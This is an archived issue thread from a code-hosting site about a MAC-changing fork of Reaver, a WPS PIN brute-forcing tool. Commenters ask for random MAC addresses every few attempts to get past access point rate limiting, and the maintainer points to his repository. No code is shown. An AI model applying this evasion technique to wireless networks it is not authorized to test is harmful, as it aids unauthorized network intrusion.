on 24 Mar 2014 at 2:53
Hi Bob, is there any new update on your code? ;)
Original comment by itmanvn
on 26 Mar 2014 at 7:35
Hi itmanvn,
Unfortunately not :-(
Do you have any idea that I can implement?
Original comment by gabrielr...@gmail.com
on 26 Mar 2014 at 5:48
[deleted comment]
Can you improve this to generate random mac every 5(or something like this)
attempts? This would be really helpful against "AP Rate Limiting". I mean
really new MAC, not only last digit.
Original comment by Xas...@gmail.com
on 3 Apr 2014 at 7:07
Please give me the reaver-14-mac-changertar; both of your links are not working.
Also, please write about how to use it step by step with an example.
Original comment by patilary...@gmail.com
on 12 Apr 2014 at 7:31
Patilary, download the code from my git repository:
https://github.com/gabrielrcouto/reaver-wps, it's working and it's the same as
reaver-1.4-mac-changer.tar.gz.
About the step by step (guide), you will find some instructions on my git
repository or you can use the bash script posted on this thread by muske.
Xas, I can improve the generation of random macs, but I need to find a new
notebook, on my macbook reaver doesn't work =(
Original comment by gabrielr...@gmail.com
on 13 Apr 2014 at 3:17
Original issue reported on code.google.com by
gabrielr...@gmail.com
on 2 Mar 2012 at 4:36